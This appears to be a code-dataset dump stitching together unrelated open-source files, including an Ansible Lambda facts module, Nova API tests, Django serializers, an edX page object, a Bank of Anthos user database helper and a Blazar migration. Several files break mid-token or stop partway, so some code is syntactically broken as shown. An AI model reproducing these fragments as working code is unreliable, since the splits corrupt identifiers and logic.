Specifies the resource type for which to gather facts. Leave blank to retrieve all facts. required: true choices: [ "aliases", "all", "config", "mappings", "policy", "versions" ] default: "all" function_name: description: - The name of the lambda function for which facts are requested. aliases: [ "function", "name"] event_source_arn: description: - For query type 'mappings', this is the Amazon Resource Name (ARN) of the Amazon Kinesis or DynamoDB stream. author: Pierre Jodouin (@pjodouin) requirements: - boto3 extends_documentation_fragment: - aws - ec2 ''' EXAMPLES = ''' --- # Simple example of listing all info for a function - name: List all for a specific function lambda_facts: query: all function_name: myFunction register: my_function_details # List all versions of a function - name: List function versions lambda_facts: query: versions function_name: myFunction register: my_function_versions # List all lambda function versions - name: List all function lambda_facts: query: all max_items: 20 - name: show Lambda facts debug: var: lambda_facts ''' RETURN = ''' --- lambda_facts: description: lambda facts returned: success type: dict lambda_facts.function: description: lambda function list returned: success type: dict lambda_facts.function.TheName: description: lambda function information, including event, mapping, and version information returned: success type: dict ''' from ansible.module_utils.aws.core import AnsibleAWSModule from ansible.module_utils.ec2 import camel_dict_to_snake_dict, get_aws_connection_info, boto3_conn import json import datetime import sys import re try: from botocore.exceptions import ClientError except ImportError: pass # protected by AnsibleAWSModule def fix_return(node): """ fixup returned dictionary :param node: :return: """ if isinstance(node, datetime.datetime): node_value = str(node) elif isinstance(node, list): node_value = [fix_return(item) for item in node] elif isinstance(node, dict): node_value = dict([(item, fix_return(node[item])) for item in node.keys()]) else: node_value = node return node_value def alias_details(client, module): """ Returns list of aliases for a specified function. 
:param client: AWS API client reference (boto3) :param module: Ansible module reference :return dict: """ lambda_facts = dict() function_name = module.params.get('function_name') if function_name: params = dict() if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items') if module.params.get('next_marker'): params['Marker'] = module.params.get('next_marker') try: lambda_facts.update(aliases=client.list_aliases(FunctionName=function_n
ame, **params)['Aliases']) except ClientError as e: if e.response['Error']['Code'] == 'ResourceNotFoundException': lambda_facts.update(aliases=[]) else: module.fail_json_aws(e, msg="Trying to get aliases") else: module.fail_json(msg='Parameter function_name required for query=aliases.') return {function_name: camel_dict_to_snake_dict(lambda_facts)} def all_details(client, module): """ Returns all lambda related facts. :param client: AWS API client reference (boto3) :param module: Ansible module reference :return dict: """ if module.params.get('max_items') or module.params.get('next_marker'): module.fail_json(msg='Cannot specify max_items nor next_marker for query=all.') lambda_facts = dict() function_name = module.params.get('function_name') if function_name: lambda_facts[function_name] = {} lambda_facts[function_name].update(config_details(client, module)[function_name]) lambda_facts[function_name].update(alias_details(client, module)[function_name]) lambda_facts[function_name].update(policy_details(client, module)[function_name]) lambda_facts[function_name].update(version_details(client, module)[function_name]) lambda_facts[function_name].update(mapping_details(client, module)[function_name]) else: lambda_facts.update(config_details(client, module)) return lambda_facts def config_details(client, module): """ Returns configuration details for one or all lambda functions. :param client: AWS API client reference (boto3) :param module: Ansible module reference :return dict: """ lambda_facts = dict() function_name = module.params.get('function_name') if function_name: try: lambda_facts.update(client.get_function_configuration(FunctionName=function_name)) except ClientError as e: if e.response['Error']['Code'] == 'ResourceNotFoundException': lambda_facts.update(function={}) else: module.fail_json_aws(e, msg="Trying to get {0} configuration".format(function_name)) else: params = dict() if module.params.get('max_items'): params['MaxItems'] = module.params.get('max_items') if module.params.get('next_marker'): params['Marker'] = module.params.get('next_marker') try: lambda_facts.update(function_list=client.list_functions(**params)['Functions']) except ClientError as e: if e.response['Error']['Code'] == 'ResourceNotFoundException': lambda_facts.update(function_list=[]) else: module.fail_json_aws(e, msg="Trying to get function list") functions = dict() for func in lambda_facts.pop('function_list', []): functions[func['FunctionName']] = camel_dict_to_snake_dict(func) return functions return {function_name: camel_dict_to_snake_dict(lambda_facts)} def mapping_details(client, module): """ Returns all lambda event source mappings. :param client: AWS API client reference (boto3) :param module: Ansible module reference :return dict: """ lambda_facts = dict() params = dict() function_name = module.params.get('function_name') if function_name: params['FunctionName'] = module.params.get('function_name') if module.params.get('event_source_arn'): params['EventSourceArn'] = module.params.get('event_source_arn') if module.params.get('max_items'): params['MaxItems'] = module.params.get('max_items') if module.params.get('next_marker'): params['Marker'] = module.params.get('next_marker') try: lambda_facts.update(mappings=client.list_event_source_mappings(**params)['EventSourceMappings'])
dozymoe/PyCircularBuffer
tests/test_index.py
Python
mit
527
0.001898
from circularbuffer import CircularBuffer from pytest import raises def test_index(): buf = CircularBuffer(32) buf.write(b'asdf\r\njkl;\r\n1234\r\n') assert buf.index(b'\r\n') == 4 assert buf.index(b'\r\n', 5) == 10 with raises(ValueError): buf.inde
x(b'x') buf.clear() buf.write(b'asdf\r\njkl;\r\n1234\r\na') assert buf.index(b'\r\n') == 4 assert buf.index(b'
\r\n', 5) == 10 with raises(ValueError): buf.index(b'x') with raises(ValueError): buf.index(b'')
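A minimal usage sketch built only from the calls exercised by the tests above (write(), index() with an optional start offset, and clear()), reusing the test's own data:

from circularbuffer import CircularBuffer

buf = CircularBuffer(32)            # capacity in bytes
buf.write(b'asdf\r\njkl;\r\n')
assert buf.index(b'\r\n') == 4      # end of the first field
assert buf.index(b'\r\n', 5) == 10  # next delimiter, searching from offset 5
buf.clear()                         # empty the buffer for reuse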
CyrilWaechter/pyRevitMEP
pyRevitMEP.tab/Lab.panel/Lab.pulldown/ConvertToFlexPipe.pushbutton/script.py
Python
gpl-3.0
451
0.004435
import rpw from pyrevit.script import get_logger logger = get_logger() selection = rpw.ui.Selection() # TODO check in only one loop number_of_unused_connectors =
sum([element.ConnectorManager.UnusedConnectors.Size for element in selection]) logger.debug(number_of_unused_connectors) if number_of_unused_connectors > 2: rpw.ui.forms.Alert('Please select only one loop') for element in selection: element.Conne
ctorManager.UnusedConnectors
kenshay/ImageScript
ProgramData/SystemFiles/Python/Lib/site-packages/elan/Pools/Quick_Tests/7____Set_System_Description_Restart_Check___.py
Python
gpl-3.0
639
0.007825
from elan import * #Set System description #Finished Viewer.Start() Viewer.CloseAndClean() Configurator.Start() Configurator.basicinformation.Click() Configurator.systemname.Wait() sleep(1) Configurator.Edit.SetText(2,"Changed") Configurator.apply.Wait() Configurator.apply.Click() Configurator.RestartHard() Configurator.WaitForControllerToComeBackOnline() Configurator.Start() Configurator.basicinformation.Click() Configurator.systemdescriptionchangedset.Wait() Configurat
or.Edit.SetText(2," ") Configurator.apply.Wait() Configurator.apply.Click() Configurator.CloseAndClean() print('
Finished')
brennmat/ruediPy
documentation/ruediPy/list_python_API.py
Python
gpl-3.0
1,842
0.050489
#!/usr/bin/env python3 import inspect from classes.rgams_SRS import rgams_SRS from classes.selectorvalve_VICI import selectorvalve_VICI from classes.selectorvalve_compositeVICI import selectorvalve_compositeVICI from classes.pressuresensor_WIKA import pressuresensor_WIKA from classes.pressuresensor_OMEGA import pressuresensor_OMEGA from classes.temperaturesensor_MAXIM import temperaturesensor_MAXIM from classes.datafile import datafile from classes.misc import misc CLASSES = [ rgams_SRS , selectorvalve_VICI , selectorvalve_compositeVICI , pressuresensor_WIKA , pressuresensor_OMEGA , temperaturesensor_MAXIM , datafile , misc ] outfile = open('python_API.tex', 'w') outfile.write( '%% THIS NEEDS THE underscore PACKAGE: \\usepackage[strings]{underscore}\n\n' ) for X in CLASSES: outfile.write ( '\subsubsection{Class \\texttt{' + X.__name__ + '}}\n' ) P = inspect.getsourcef
ile(X) outfile.write ( '\path{' + P[P.find('python'):len(P)] + '}\par\n' ) doc = inspect.getdoc(X) if doc is None: outfile.write ( 'No class description available.\par' ) else: # outfile.write ( '\\texttt{' + inspect.getdoc(X) + '+\n' ) outfile.write ( inspect.getdoc(X) + '\par' ) outfile.write ( '\n\n' ) for name, data in inspect.getmembers(X): if name[0:2] == '__
' : continue
		if name == '__doc__': continue
		if name == '__init__': continue
		if name == '__module__': continue
		outfile.write ( '\paragraph{Method \\texttt{' + name + '}}\n\\vspace{1ex}\n' )
		doc = getattr(X, name).__doc__
		if doc is None:
			outfile.write ( 'No method description available.\par' )
		else:
			u = ''
			for line in doc.splitlines():
				u = u + line.lstrip() + '\\newline\n'
			outfile.write ( '\\texttt{' + u + '}' )
		outfile.write ( '\n\n' )

outfile.close()
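The generator above is driven by inspect.getdoc() and inspect.getmembers(); a tiny self-contained illustration of the same pattern on a throwaway class:

import inspect

class Demo:
    """A class-level docstring."""

    def method(self):
        """A method-level docstring."""

print(inspect.getdoc(Demo))   # -> A class-level docstring.
for name, member in inspect.getmembers(Demo, inspect.isfunction):
    print(name, '->', inspect.getdoc(member))   # method -> A method-level docstring.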
skashyap7/polar.usc.edu
html/team25ev/similarity_clustering/read_json.py
Python
apache-2.0
416
0.012019
import scipy.cluster.hierarchy as hcl
from scipy.spatial.distance import squareform
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from scipy.cluster.hierarchy import dendrogram
import scipy
import json

#data = pd.read_json(path_or_buf= 'C:\Users\davtalab\Desktop\outJSON.json')
# raw string avoids '\U...' being parsed as a unicode escape on Python 3
parsed_json = json.loads(open(r'C:\Users\davtalab\Desktop\data.json').read())
print(parsed_json[1]['id'])
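The scipy.cluster.hierarchy imports above go unused in the snippet; for reference, this is how those helpers are typically combined, with a made-up 3x3 distance matrix standing in for whatever the JSON actually holds:

import numpy as np
import scipy.cluster.hierarchy as hcl
from scipy.spatial.distance import squareform

dist = np.array([[0.0, 0.5, 0.9],   # made-up symmetric distances,
                 [0.5, 0.0, 0.4],   # not taken from the JSON file
                 [0.9, 0.4, 0.0]])
linkage = hcl.linkage(squareform(dist), method='average')  # condensed form in
print(linkage)  # one merge per row: cluster ids, distance, new cluster size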
vmthunder/nova
nova/tests/api/openstack/compute/test_server_actions.py
Python
apache-2.0
60,337
0.000447
# Copyright 2011 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import base64 import uuid import mock import mox from oslo.config import cfg import webob from nova.api.openstack.compute import servers from nova.compute import api as compute_api from nova.compute import task_states from nova.compute import vm_states from nova import context from nova import db from nova import exception from nova.image import glance from nova import objects from nova.openstack.common import jsonutils from nova.openstack.common import uuidutils from nova import test from nova.tests.api.openstack import fakes from nova.tests import fake_block_device from nova.tests import fake_instance from nova.tests.image import fake from nova.tests import matchers from nova.tests import utils CONF = cfg.CONF CONF.import_opt('password_length', 'nova.utils') FAKE_UUID = fakes.FAKE_UUID INSTANCE_IDS = {FAKE_UUID: 1} def return_server_not_found(*arg, **kwarg): raise exception.NotFound() def instance_update_and_get_original(context, instance_uuid, values, update_cells=True, columns_to_join=None, ): inst = fakes.stub_instance(INSTANCE_IDS[instance_uuid], host='fake_host') inst = dict(inst, **values) return (inst, inst) def instance_update(context, instance_uuid, kwargs, update_cells=True): inst = fakes.stub_instance(INSTANCE_IDS[instance_uuid], host='fake_host') return inst class MockSetAdminPassword(object): def __init__(self): self.instance_id = None self.password = None def __call__(self, context, instance, password): self.instance_id = instance['uuid'] self.password = password class ServerActionsControllerTest(test.TestCase): image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6' image_href = 'http://localhost/v2/fake/images/%s' % image_uuid def setUp(self): super(ServerActionsControllerTest, self).setUp() self.stubs.Set(db, 'instance_get_by_uuid', fakes.fake_instance_get(vm_state=vm_states.ACTIVE, host='fake_host')) self.stubs.Set(db, 'instance_update_and_get_original', instance_update_and_get_original) fakes.stub_out_nw_api(self.stubs) fakes.stub_out_compute_api_snapshot(self.stubs) fake.stub_out_image_service(self.stubs) self.flags(allow_instance_snapshots=True, enable_instance_password=True) self.uuid = FAKE_UUID self.url = '/v2/fake/servers/%s/action' % self.uuid self._image_href = '155d900f-4e14-4e4c-a73d-069cbf4541e6' class FakeExtManager(object): def is_loaded(self, ext): return False self.controller = servers.Controller(ext_mgr=FakeExtManager()) self.compute_api = self.controller.compute_api self.context = context.RequestContext('fake', 'fake') self.app = fakes.wsgi_app(init_only=('servers',), fake_auth_context=self.context) def _make_request(self, url, body): req = webob.Request.blank('/v2/fake' + url) req.method = 'POST' req.body = jsonutils.dumps(body) req.content_type = 'application/json' return req.get_response(self.app) def _stub_instance_get(self, uuid=None): self.mox.StubOutWithMock(compute_api.API, 'get') if uuid is None: uuid = uuidutils.generate_uuid() instance = 
fake_instance.fake_db_instance( id=1, uuid=uuid, vm_state=vm_states.ACTIVE, task_state=None) instance = objects.Instance._from_db_object( self.context, objects.Instance(), instance) self.compute_api.get(self.context, uuid, want_objects=True).AndReturn(instance) return instance def _test_locked_instance(self, action, method=None, body_map=None, compute_api_args_map=None): if method is None: method = action if body_map is None: body_map = {} if compute_api_args_map is None: compute_api_args_map = {} instance = self._stub_instance_get() args, kwargs = compute_api_args_map.get(action, ((), {})) getattr(compute_api.API, method)(self.context, instance, *args, **kwargs).AndRaise( exception.InstanceIsLocked(instance_uuid=instance['uuid'])) self.mox.ReplayAll() res = self._make_request('/servers/%s/action' % instance['uuid'], {action: body_map.get(action)}) self.assertEqual(409, res.status_int) # Do these here instead of tearDown because this method is called # more than once for the same test case self.mox.VerifyAll() self.mox.UnsetStubs() def test_actions_with_locked_instance(self): actions = ['resize', 'confirmResize', 'revertResize', 'reboot', 'rebuild'] method_translations = {'confirmResize': 'confirm_resize', 'revertResize': 'revert_resize'} body_map = {'resize': {'flavorRef': '2'}, 'reboot': {'type': 'HARD'}, 'rebuild': {'imageRef': self.image_uuid, 'adminPass': 'TNc53Dr8s7vw'}} args_map = {'resize': (('2'), {}), 'confirmResize': ((), {}), 'reboot': (('HARD',), {}), 'rebuild': ((self.image_uuid, 'TNc53Dr8s7vw'), {'files_to_inject': None})} for action in actions: method = method_translations.get(action) self.mox.StubOutWithMock(compute_api.API, method or action) self._test_locked_instance(action, method=method, body_map=body_map, compute_api_args_map=args_map) def test_server_change_password(self): mock_method = MockSetAdminPassword() self.stubs.Set(compute_api.API, 'set_admin_password', mock_method) body = {'changePassword': {'adminPass': '1234pass'}} req = fakes.HTTPRequest.blank(self.url) self.controller._action_change_password(req, FAKE_UUID, body) self.assertEqual(mock_method.instance_id, self.uuid) self.assertEqual(mock_method.password, '1234pass') def test_server_change_password_pass_disabled(self): # run with enable_instance_password disabled to verify adminPass # is missing from response. See lp bug 921814 self.flags(enable_instance_password=False) mock_method = MockSetAdminPassword() self.stubs.Set(compute_api.API, 'set_admin_password', mock_
method) body = {'changePassword': {'adminPass': '1234pass'}} req = fakes.HTTPRequest.blank(self.url) self.controller._action_change_password(req, FAKE_UUID, body) self.assertEqual(mock_method.instance_id, self.uuid) # note,the mock still contains the password. self.assertEqual(mock_method.password, '1234pass') def test_server_change_password_not_a_string(self): body = {'changePassword': {'adminPass': 1234}} req = fakes.
HTTPRequest.blank(self.url) self.assertRaises(webob.exc.HTTPBadRequest, self.controller._action_change_password, req, FAKE_UUID, body) def tes
onaio/dkobo
dkobo/koboform/serializers.py
Python
agpl-3.0
2,038
0.002944
import json

from rest_framework import serializers
from models import SurveyDraft

from taggit.models import Tag


class WritableJSONField(serializers.Field):
    """Serializer for JSONField -- required to make the field writable.

    ALSO REQUIRED because the default JSONField serialization includes
    the `u` prefix on strings when running Django 1.8, resulting in
    invalid JSON.
    """

    def __init__(self, **kwargs):
        self.allow_blank = kwargs.pop('allow_blank', False)
        super(WritableJSONField, self).__init__(**kwargs)

    def to_internal_value(self, data):
        if (not data) and (not self.required):
            return None
        else:
            try:
                return json.loads(data)
            except Exception as e:
                raise serializers.ValidationError(
                    u'Unable to parse JSON: {}'.format(e))

    def to_representation(self, value):
        return value


class ListSurveyDraftSerializer(serializers.HyperlinkedModelSeriali
zer): class Meta: model = SurveyDraft fields = ('id', 'name', 'asset_type',
'summary', 'date_modified', 'description') summary = WritableJSONField(required=False) class DetailSurveyDraftSerializer(serializers.HyperlinkedModelSerializer): tags = serializers.SerializerMethodField('get_tag_names') summary = WritableJSONField(required=False) class Meta: model = SurveyDraft fields = ('id', 'name', 'body', 'summary', 'date_modified', 'description', 'tags') def get_tag_names(self, obj): return obj.tags.names() class TagSerializer(serializers.HyperlinkedModelSerializer): count = serializers.SerializerMethodField() label = serializers.CharField(source='name') class Meta: model = Tag fields = ('id', 'label', 'count') def get_count(self, obj): return SurveyDraft.objects.filter(tags__name__in=[obj.name])\ .filter(user=self.context.get('request', None).user)\ .filter(asset_type='question')\ .count()
e7dal/hexy
hexy/cursor.py
Python
gpl-3.0
1,100
0.128182
from .util.deb import deb from .util.nrange import nrange from .cell import Cell #F,e,Cursor from .grid import spoint CURSOR_POS=None d
ef gcp(): #get cursor position global CURSOR_POS deb('gcp'
,CURSOR_POS) return CURSOR_POS def scp(x,y): deb('scp',gcp(),x,y) cxc=0 #todo, normalize in cursor... global CURSOR_POS CURSOR_POS=(x,y) assert (x,y)==gcp() #todo cpget and cpset cpget=gcp cpset=scp def cursor(HG,x,y,f,X,Y): deb('make an a cursor in the empty space around point in cell x,y',x,y) #x,y=x-1,y-1 assert len(f)==4 #HG=_clearcursor(HG) i=x j=y scp(i,j) cxl=Cell(f[0],0,0) cyu=Cell(f[1],0,0) cxr=Cell(f[2],0,0) cyd=Cell(f[3],0,0,) HG=spoint(i-1,j,HG,cxl) HG=spoint(i,j-1,HG,cyu) HG=spoint(i+1,j,HG,cxr) HG=spoint(i,j+1,HG,cyd) return HG def grid_cursor(HG,x,y,f,X,Y): return cursor(HG,x,y,f,X,Y) def _clearcursor(HG): cp=gcp() r1=r2=r3=r4=Cell('.',0,0) deb('clear a cursor in the empty space around point in cell x,y',cp) if not cp:return HG i,j=cp HG=spoint(i-1,j,HG,r1) HG=spoint(i,j-1,HG,r2) HG=spoint(i+1,j,HG,r3) HG=spoint(i,j+1,HG,r4) return HG
frippe12573/geonode
geonode/maps/urls.py
Python
gpl-3.0
2,230
0.001794
# -*- coding: utf-8 -*- ######################################################################### # # Copyright (C) 2012 OpenPlans # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public
License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # #####################
#################################################### from django.conf.urls.defaults import patterns, url js_info_dict = { 'packages': ('geonode.maps',), } urlpatterns = patterns('geonode.maps.views', url(r'^$', 'map_list', name='maps_browse'), url(r'^tag/(?P<slug>[-\w]+?)/$', 'maps_tag', name='maps_browse_tag'), url(r'^new$', 'new_map', name="new_map"), url(r'^new/data$', 'new_map_json', name='new_map_json'), url(r'^(?P<mapid>\d+)$', 'map_detail', name='map_detail'), url(r'^(?P<mapid>\d+)/view$', 'map_view', name='map_view'), url(r'^(?P<mapid>\d+)/data$', 'map_json', name='map_json'), url(r'^(?P<mapid>\d+)/download$', 'map_download', name='map_download'), url(r'^(?P<mapid>\d+)/wmc$', 'map_wmc', name='map_wmc'), url(r'^(?P<mapid>\d+)/remove$', 'map_remove', name='map_remove'), url(r'^(?P<mapid>\d+)/metadata$', 'map_metadata', name='map_metadata'), url(r'^(?P<mapid>\d+)/embed$', 'map_embed', name='map_embed'), url(r'^(?P<mapid>\d+)/permissions$', 'map_permissions', name='map_permissions'), url(r'^(?P<mapid>\d+)/thumbnail$', 'map_thumbnail', name='map_thumbnail'), url(r'^check/$', 'map_download_check', name='map_download_check'), url(r'^embed/$', 'map_embed', name='map_embed'), url(r'^(?P<layername>[^/]*)/attributes', 'maplayer_attributes', name='maplayer_attributes'), #url(r'^change-poc/(?P<ids>\w+)$', 'change_poc', name='maps_change_poc'), )
OCA/l10n-switzerland
l10n_ch_states/__manifest__.py
Python
agpl-3.0
493
0
# Copyright 2019-2020 Camptocamp SA # Copyright 2015 Mathias Neef copadoME
DIA UG # License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl). { "name": "Switzerland Country States", "category": "Localisation", "summary": "", "version": "14.0.1.0.0", "author": "copado MEDIA UG," "Odoo Community Association (OCA)", "website": "https://github.com/OCA/l10n-switzerland", "license": "AGPL-3", "depends": ["base"], "data": ["data/res_countr
y_states.xml"], }
romain-li/edx-platform
common/test/acceptance/pages/lms/courseware.py
Python
agpl-3.0
23,445
0.003156
""" Courseware page. """ from bok_choy.page_object import PageObject, unguarded from bok_choy.promise import EmptyPromise import re from selenium.webdriver.common.action_chains import ActionChains from common.test.acceptance.pages.lms.bookmarks import BookmarksPage from common.test.acceptance.pages.lms.course_page import CoursePage class CoursewarePage(CoursePage): """ Course info. """ url_path = "courseware/" xblock_component_selector = '.vert .xblock' # TODO: TNL-6546: Remove sidebar selectors section_selector = '.chapter' subsection_selector = '.chapter-content-container a' def __init__(self, browser, course_id): super(CoursewarePage, self).__init__(browser, course_id) self.nav = CourseNavPage(browser, self) def is_browser_on_page(self): return self.q(css='.course-content').present @property def chapter_count_in_navigation(self): """ Returns count of chapters available on LHS navigation. """ return len(self.q(css='nav.course-navigation a.chapter')) # TODO: TNL-6546: Remove and find callers. @property def num_sections(self): """ Return the number of sections in the sidebar on the page """ return len(self.q(css=self.section_selector)) # TODO: TNL-6546: Remove and find callers. @property def num_subsections(self): """ Return the number of subsections in the sidebar on the page, including in collapsed sections """ return len(self.q(css=self.subsection_selector)) @property def xblock_components(self): """ Return the xblock components within the unit on the page. """ return self.q(css=self.xblock_component_selector) @property def num_xblock_components(self): """ Return the number of rendered xblocks within the unit on the page """ return len(self.xblock_components) def xblock_component_type(self, index=0): """ Extract rendered xblock component type. Returns: str: xblock module type index: which xblock to query, where the index is the vertical display within the page (default is 0) """ return self.q(css=self.xblock_component_selector).attrs('data-block-type')[index] def xblock_component_html_content(self, index=0): """ Extract rendered xblock component html content. Returns: str: xblock module html content index: which xblock to query, where the index is the vertical display within the page (default is 0) """ # When Student Notes feature is enabled, it looks for the content inside # `.edx-notes-wrapper-content` element (Otherwise, you will get an # additional html related to Student Notes). element = self.q(css='{} .edx-notes-wrapper-content'.format(self.xblock_component_selector)) if element.first: return element.attrs('innerHTML')[index].strip() else: return self.q(css=self.xblock_component_selector).attrs('innerHTML')[index].strip() def verify_to
oltips_displayed(self): """ Verify that all sequence navigation bar tooltips are being displayed upon mouse hover. If a tool
tip does not appear, raise a BrokenPromise. """ for index, tab in enumerate(self.q(css='#sequence-list > li')): ActionChains(self.browser).move_to_element(tab).perform() self.wait_for_element_visibility( '#tab_{index} > .sequence-tooltip'.format(index=index), 'Tab {index} should appear'.format(index=index) ) @property def course_license(self): """ Returns the course license text, if present. Else returns None. """ element = self.q(css="#content .container-footer .course-license") if element.is_present(): return element.text[0] return None def go_to_sequential_position(self, sequential_position): """ Within a section/subsection navigate to the sequential position specified by `sequential_position`. Arguments: sequential_position (int): position in sequential bar """ def is_at_new_position(): """ Returns whether the specified tab has become active. It is defensive against the case where the page is still being loaded. """ active_tab = self._active_sequence_tab try: return active_tab and int(active_tab.attrs('data-element')[0]) == sequential_position except IndexError: return False sequential_position_css = '#sequence-list #tab_{0}'.format(sequential_position - 1) self.q(css=sequential_position_css).first.click() EmptyPromise(is_at_new_position, "Position navigation fulfilled").fulfill() @property def sequential_position(self): """ Returns the position of the active tab in the sequence. """ tab_id = self._active_sequence_tab.attrs('id')[0] return int(tab_id.split('_')[1]) @property def _active_sequence_tab(self): # pylint: disable=missing-docstring return self.q(css='#sequence-list .nav-item.active') @property def is_next_button_enabled(self): # pylint: disable=missing-docstring return not self.q(css='.sequence-nav > .sequence-nav-button.button-next.disabled').is_present() @property def is_previous_button_enabled(self): # pylint: disable=missing-docstring return not self.q(css='.sequence-nav > .sequence-nav-button.button-previous.disabled').is_present() def click_next_button_on_top(self): # pylint: disable=missing-docstring self._click_navigation_button('sequence-nav', 'button-next') def click_next_button_on_bottom(self): # pylint: disable=missing-docstring self._click_navigation_button('sequence-bottom', 'button-next') def click_previous_button_on_top(self): # pylint: disable=missing-docstring self._click_navigation_button('sequence-nav', 'button-previous') def click_previous_button_on_bottom(self): # pylint: disable=missing-docstring self._click_navigation_button('sequence-bottom', 'button-previous') def _click_navigation_button(self, top_or_bottom_class, next_or_previous_class): """ Clicks the navigation button, given the respective CSS classes. """ previous_tab_id = self._active_sequence_tab.attrs('data-id')[0] def is_at_new_tab_id(): """ Returns whether the active tab has changed. It is defensive against the case where the page is still being loaded. """ active_tab = self._active_sequence_tab try: return active_tab and previous_tab_id != active_tab.attrs('data-id')[0] except IndexError: return False self.q( css='.{} > .sequence-nav-button.{}'.format(top_or_bottom_class, next_or_previous_class) ).first.click() EmptyPromise(is_at_new_tab_id, "Button navigation fulfilled").fulfill() @property def can_start_proctored_exam(self): """ Returns True if the timed/proctored exam timer bar is visible on the courseware. 
""" return self.q(css='button.start-timed-exam[data-start-immediately="false"]').is_present() def start_timed_exam(self): """ clicks the start this timed exam link """ self.q(css=".xblock-student_view .timed-exam .start-timed-exam").first.click() self.wait_for_element_presence(".proctored_exam_status .exam-timer", "Timer bar") def stop_timed_exam(self): """ clicks the stop this timed exam link """ self.q(css=".proctored_exam_status button.exam-button-turn-in-exam").first.click() self.wait_for_element_absence(".proctored_exam_status .exam-button-turn-in-exam", "End Exam Button gone")
GoogleCloudPlatform/bank-of-anthos
src/userservice/db.py
Python
apache-2.0
4,158
0.000962
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ db manages interactions with the underlying database """ import logging import random from sqlalchemy import create_engine, MetaData, Table, Column, String, Date, LargeBinary from opentelemetry.instrumentation.sqlalchemy import SQLAlchemyInstrumentor class UserDb: """ UserDb provides a set of helper functions over SQLAlchemy to handle db operations for userservice """ def __init__(self, uri, logger=logging): self.engine = create_engine(uri) self.logger = logger self.users_table = Table( 'users', MetaData(self.engine), Column('accountid', String, primary_key=True), Column('username', String, unique=True, nullable=False), Column('passhash', LargeBinary, nullable=False), Column('firstname', String, nullable=False), Column('lastname', String, nullable=False), Column('birthday', Date, nullable=False), Column('timezone', String, nullable=False), Column('address', String, nullable=False), Column('state', String, nullable=False), Column('zip', String, nullable=False), Column('ssn', String, nullable=False), ) # Set up tracing autoinstrumentation for sqlalchemy SQLAlchemyInstrumentor().instrument( engine=self.engine, service='users', ) def add_user(self, user): """Add a user to the database. Params: user - a key/value dict of attributes describing a new user {'username': username, 'password': password, ...} Raises: SQLAlchemyError if there was an issue with the database """ statement = self.users_table.insert().values(user) self.logger.debug('QUERY: %s', str(statement)) with self.engine.connect() as conn: conn.execute(statement) def generate_accountid(self): """Generates a globally unique alphanumerical accountid.""" self.logger.debug('Generating an account ID') accountid = None with self.engine.connect() as conn: while accountid is None: accountid = str(random.randint(1e9, (1e10 - 1))) statement = self.users_table.select().where( self.users_table.c.accountid == accountid ) self.logger.debug('QUERY: %s', str(statement)) result = conn.execute(statement).first() # If there already exists an account, try again. if result is not None: accountid = None
self.logger.debug('RESULT: account ID already exists. Trying again') self.logger.debug('RESULT: account ID generated.') return accountid def get_user(self, username): """Get user data for the specified username. Params: username - the username of the user Return: a key/value
dict of user attributes, {'username': username, 'accountid': accountid, ...} or None if that user does not exist Raises: SQLAlchemyError if there was an issue with the database """ statement = self.users_table.select().where(self.users_table.c.username == username) self.logger.debug('QUERY: %s', str(statement)) with self.engine.connect() as conn: result = conn.execute(statement).first() self.logger.debug('RESULT: fetched user data for %s', username) return dict(result) if result is not None else None
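A local sketch of driving UserDb end to end with an in-memory SQLite engine. The URI, the sample values, and the explicit table creation are assumptions for the sketch (the real service targets an existing Postgres-style database and bcrypt passhashes), and the sqlalchemy/opentelemetry packages must be installed for the constructor to run.

import datetime

db = UserDb('sqlite:///:memory:')   # assumed URI for local experimentation
db.users_table.create(db.engine)    # the sketch needs the table to exist

db.add_user({
    'accountid': db.generate_accountid(),
    'username': 'alice',
    'passhash': b'not-a-real-hash',  # placeholder, not a real bcrypt hash
    'firstname': 'Alice',
    'lastname': 'Example',
    'birthday': datetime.date(1990, 1, 1),
    'timezone': 'UTC',
    'address': '1 Main St',
    'state': 'CA',
    'zip': '94000',
    'ssn': '000-00-0000',
})
print(db.get_user('alice'))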
ChameleonCloud/blazar
blazar/db/migration/alembic_migrations/versions/42c7fd6e792e_add_device_reservation.py
Python
apache-2.0
5,436
0.000552
# Copyright 2021 OpenStack Foundation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """add device reservation Revision ID: 42c7fd6e792e Revises: 02e2f2186d98 Create Date: 2021-06-22 15:27:00.239725 """ # revision identifiers, used by Alembic. revision = '42c7fd6e792e' down_revision = '02e2f2186d98' from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import mysql def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('devices', sa.Column('created_at', sa.DateTime(), nullable=True), sa.Column('updated_at', sa.DateTime(), nullable=True), sa.Column('id', sa.String(length=36), nullable=False), sa.Column('name', sa.String(length=255), nullable=False), sa.Column('device_type', sa.Enum('container', 'vm', 'shell', name='allowed_device_types'), nullable=False), 